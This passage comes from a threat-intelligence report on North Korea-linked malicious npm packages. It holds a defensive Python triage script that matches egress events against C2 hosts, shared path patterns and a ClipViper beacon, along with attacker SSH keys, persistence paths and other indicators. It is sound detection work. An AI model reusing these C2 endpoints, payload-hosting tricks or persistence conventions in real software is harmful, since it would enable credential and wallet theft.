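Two rows in the C2 table need different handling from the rest: api.devnet.solana[.]com is legitimate infrastructure this cluster abuses, so blocking or alerting on the host alone would page on every Solana developer, and the huggingface[.]co entry is only an indicator together with its path. The following Python is an added example, not Panther's detection content: it triages constructed HTTP egress events against a hand-transcribed, re-fanged subset of the table, scores known C2 hosts and IPs high, the shared `/api/validate/*` and OtterCookie config paths medium even on a host not yet in the table, the ClipViper `{"text": "installed"}` beacon medium, and shared infrastructure low. The event field names (ts, host, path, method, body), the host bot-backend-7.vercel.app and the filename release.bin are assumptions made for the demonstration, not indicators from the report.

```python
import json
from typing import Dict, Iterable, List

# Subset of the C2 table above, re-fanged, transcribed for this example; extend from the table.
C2_DOMAINS = {
    "nonce-link.vercel.app", "mono-link.vercel.app", "polymarkettrading.vercel.app",
    "eslint-helper.vercel.app", "eslint-config.vercel.app", "api.fivefingerz.dev",
    "polymarket-clob2.blog", "polymarket-bots-backend.vercel.app",
    "api.mywalletsss.store", "clob-polymarket.com", "color-picker.live",
    "cloudflareinsights.vercel.app", "wallet-management-tg-bot.vercel.app",
    "polybot-management-v1.vercel.app", "polybot-management-v2.vercel.app",
    "polymarket-api-v2.vercel.app", "polymarket-cli-v2.vercel.app",
    "cloudflare-protection.vercel.app", "clob.0xundying.dev",
    "logger.clob.health", "blxrbn.com",
}
C2_IPS = {"170.205.31.203", "208.84.100.22", "204.10.194.64"}
# IoCs on shared hosting: the host alone is not an indicator, host plus path prefix is.
C2_URL_PREFIXES = {("huggingface.co", "/Lordplay/system-releases/resolve/main/")}
# Legitimate infrastructure abused by this cluster: a hit is a lead, not a verdict.
SHARED_INFRA = {"api.devnet.solana.com"}
# Endpoint structure shared across actors; /api/v1 is left out as too generic to score.
C2_PATH_PREFIXES = ("/api/validate/", "/api/ssh-key", "/api/scan-patterns", "/api/block-patterns")
CLIPVIPER_BEACON = {"text": "installed"}
RANK = {"low": 1, "medium": 2, "high": 3}


def normalize_host(host: str) -> str:
    """Lower-case, drop a :port suffix and a trailing dot (IPv6 literals not handled)."""
    return host.lower().split(":")[0].rstrip(".")


def host_in(host: str, domains: Iterable[str]) -> bool:
    return any(host == d or host.endswith("." + d) for d in domains)


def classify(event: Dict) -> List[str]:
    """Return 'severity: reason' strings for one egress event (empty list = no match)."""
    host = normalize_host(event.get("host", ""))
    path = event.get("path", "")
    reasons: List[str] = []
    if host_in(host, C2_DOMAINS) or host in C2_IPS:
        reasons.append("high: known Contagious Trader C2 host")
    if any(host == h and path.startswith(p) for h, p in C2_URL_PREFIXES):
        reasons.append("high: known payload-hosting URL on shared hosting")
    if path.startswith(C2_PATH_PREFIXES):
        reasons.append("medium: PromptMink/OtterCookie C2 path pattern")
    body = event.get("body")
    if body:
        try:
            if json.loads(body) == CLIPVIPER_BEACON:
                reasons.append("medium: ClipViper install-time beacon body")
        except ValueError:
            pass
    if not reasons and host_in(host, SHARED_INFRA):
        reasons.append("low: shared infrastructure abused by this cluster; corroborate with process or package data")
    return reasons


def triage(events: Iterable[Dict]) -> List[Dict]:
    """Keep only events with a reason, tagged with the highest severity among their reasons."""
    out = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            severity = max((r.split(":")[0] for r in reasons), key=RANK.get)
            out.append({"ts": ev.get("ts"), "host": ev.get("host"),
                        "severity": severity, "reasons": reasons})
    return out


# Constructed egress events for the demonstration; not captured traffic.
SAMPLE_EVENTS = [
    {"ts": "2026-05-06T10:00:01Z", "host": "api.polymarket.com", "path": "/markets", "method": "GET"},
    {"ts": "2026-05-06T10:00:07Z", "host": "nonce-link.vercel.app", "path": "/api/validate/7c2a",
     "method": "POST", "body": "{\"text\": \"installed\"}"},
    {"ts": "2026-05-06T10:00:09Z", "host": "208.84.100.22:3001", "path": "/api/ssh-key", "method": "GET"},
    {"ts": "2026-05-06T10:00:12Z", "host": "api.devnet.solana.com", "path": "/", "method": "POST",
     "body": "{\"jsonrpc\": \"2.0\", \"method\": \"getAccountInfo\"}"},
    {"ts": "2026-05-06T10:00:15Z", "host": "huggingface.co",
     "path": "/Lordplay/system-releases/resolve/main/release.bin", "method": "GET"},
    {"ts": "2026-05-06T10:00:20Z", "host": "bot-backend-7.vercel.app", "path": "/api/validate/9f3",
     "method": "POST"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["severity"].upper(), hit["ts"], hit["host"], "|", "; ".join(hit["reasons"]))
```

The last sample event shows why the path pattern is worth scoring on its own: a freshly rotated Vercel backend is not in any blocklist yet, but the `/api/validate/` convention the PromptMink actors share still surfaces it at medium for an analyst to pivot on.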


SSH Keys

Key 1, lorine93s (picocolor-logger, pinky-logger, chalki-pretty, emojiprint-logger, chalks-logger v1.1.3):

Key 2, lorine93s (chalks-logger v1.1.0-1.1.1, chalk-pro-logger v1.1.1):

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDwzFmTsUVxphkQy4Ua6bEeBGqtWCX9VJpXG8Q1Y6TMI polymarkeths@gmail[.]

Key 3, npmpodev0707 (styled-text-logger):

Key 4, devking1616 (color-logger-console):

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDmWnP8URefTNSLWC1Vkh9lY7YRrm2zXW9TkyMf5tvvxKzNbcuHbT4gBDD5GzqAAeaD4rqvaTj2Fn52pB6gu1RTopSIO6LyLnCWOSeCFNKLVwGXFGczNt8zkYxIvWMe0ls8ox5QhDNiaTr4MV03MjIi+zpvNbz8Hbh5LposliFAO6hq/EJCfcbDbfMtHXx06pMFr1jCffKHYcN8OctgAWacG4w/M62NjsSUpW7MC5uN19IBGWM4/W6+JD4O9CMOHRoGcElzGfOQZlsAd6WxJExBDhIrL8ko+5TGKAn5+UkbY+I8LZgbg+LlxsunVJqofH3Sz0u8YDf0f7iXJBcNqOhOXT8Pny9wC5Q3ho4PpsNbPAhIqE3YD+WD4bXXlIF4E/5WkGFx/vocxHrZboJmxkL6PZE36VWR1sNaf3plwwR7hhdTbxDtsBV+M74bixysGw37f9h+j3hhr3VV+pGMWTk14S/6jLmDlSj0YJaXWOk7CrKHcl4hN2obM75SZxh/Zegd2N1rM3Rz6ea33hl1re4tNOAErCMqMx65JmYdmC3MeAIBhZIWf9K/IyFs2nwrOywNcnH+2EQVn4T3+SP/RXvO/xr6R49xg2XMYrrq/Q+KeEUvrxz7M+NRxviYPpg0mNlqbEmwca5kflt1zOMhMJ/JQuKZ+ofgx5S494RcPXHiBw== advin

Key 5, soju_dev (pino-pretty-logger):

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDkLsr0i9Y+wkw8u3HefyHwyzn+kEni7cQ3ozNucJFYYBkZCv6Jj/p0Lm+RSBdPCPt6gvhkccoJyJCO9o8pw0dKlrLKkQiOYQWtDAgFJq5Hb+CgtlI3GYPT9HMtfrDWFhEJQ/gcenTNCmA6dptKCJTFnaySNE/CBTLcQR7o1l4AeX1ZV96zZ6VhHy0gC8ZjvHKfozgQlEXuAxTlIPmk7XJ0q9BnL1gjucr2vuj9mngYDYXueyucJJ4ypfCRiSVet3pLx530vszgqDxQb78lZGpUtKT5eTJwYQ2jeoBX2zbeskywQvc0I9wZLzapEblfJCaR3xQnVn+kViY5z7hJNEb6JbqT2wo2jIMhuSMcFAsYhYQ6TLLqko3gn3LfnL9K0ZRodRT+NEM8My/Q0+r1TasfJ2r4nd11uf0p96mn+DrECdSOfn/28hwi1xJ8atUcfUD5HsLFfhzKiMdYDO4Uv0eGi3Y6sQSmvyA/f7Xduegj6LucrErzOpZx7/fbTvIDKFRCI68xtDosmz9bsbAsq+5g8lynx5qng+QLLcvj0d8r1BM+7uOVuqAGaLJkTrCmcb+ko/hQMicsCWxXQfz3c+9kKMODY3zO0Ndw9hdm+dI3cuuqpgPVClydr1CGohEK6Cv+7CPxKGl8PbSP67gxkPkmCKBS6u7DSAVPQu1FK9t8Cw== user@DESKTOP-VFF5DKR

Key 6, npm_kei (pretty-pino-logger):


Additional IOCs

| IOC | Type | Notes |
|---|---|---|
| 4WF8QCFEnVD7BLs3QAVe2SjxRZ4n3EboCsdhj363VAqZ | Solana devnet account | Used by st-bigintr (a.n.n.as.ibal2.36) to store and serve an executable payload via the getAccountInfo RPC. Payload is base64-decoded and executed via new Function(). |
| polymarkeths[@]gmail[.]com | Email | Embedded in the lorine93s SSH Key 2 comment; not an npm account |
| DESKTOP-EDKDDLL | Windows hostname | Leaked in the npmpodev0707 SSH key; links to devking1616 |
| DESKTOP-VFF5DKR | Windows hostname | Leaked in the soju_dev SSH key |
| /api/validate/* | URL path pattern | Universal C2 endpoint across all PromptMink actors |
| {"text": "installed"} | Beacon payload | ClipViper install-time victim tracking |
| %LOCALAPPDATA%\prettier-lint\cdll.mjs | ClipViper persistence | Clipboard stealer payload |
| %LOCALAPPDATA%\prettier-lint\ctll.mjs | ClipViper persistence | Dropper payload |
| %LOCALAPPDATA%\prettier-lint\cdll.xml | ClipViper persistence | Task configuration |
| %LOCALAPPDATA%\prettier-lint\cdll-run-hidden.vbs | ClipViper persistence | VBScript launcher, suppresses the console window |
| %USERPROFILE%\.cdll-clipboard-worker.lock | ClipViper persistence | Instance lockfile |
| CdllProtect | ClipViper persistence | Scheduled task name, mimics a system service |
| C:\Users\Administrator\Documents\0x0-github\data_service\node\pip-ai\pip-lint | OPSEC artifact | Attacker dev path in cdll-run-hidden.vbs, identical in api-ts-utils and prettier-resolver |
| C:\nvm4w\nodejs\node.exe | OPSEC artifact | Attacker Node.js install path |
| pip-lint | OPSEC artifact | Original project name before the rename to prettier-lint |
| 0x0-github | OPSEC artifact | Attacker GitHub workspace directory |
| DESKTOP-4TO2VRJ | Windows hostname | Leaked in pretty-pino-logger |


References

  1. Panther Labs, Polymarket Trader Funds at Risk, April 2026

  2. Panther Labs, Inside DPRK's npm malware factory, April 2026

  3. Panther Labs, Tracking an OtterCookie Infostealer Campaign Across npm, April 2026

  4. KMSec, Contagious Trader campaign, March 2026

  5. KMSec, DPRK npm packages research feed

  6. ReversingLabs, PromptMink malware analysis

  7. @stephenlacy, CashBlazorLab malware analysis thread, May 2026

  8. @MalwareUtkonos, prettier-resolver IOC analysis, May 2026

  9. Socket.dev, bn-eslint.js malware alert

  10. SafeDep, Malicious redeem-onchain-sdk npm Targets Crypto Wallets, April 2026

  11. BlueVoyant TFCTI, OtterCookie: Shifty Corsair's Bifurcated Attack Strategy, May 2026

  12. GitLab Threat Intelligence, North Korean tradecraft on GitLab, February 2026

  13. Walmart Global Tech, Mapping OtterCookie Infrastructure, April 2026

  14. Microsoft Security Blog, Contagious Interview malware delivered through fake developer job interviews, March 2026
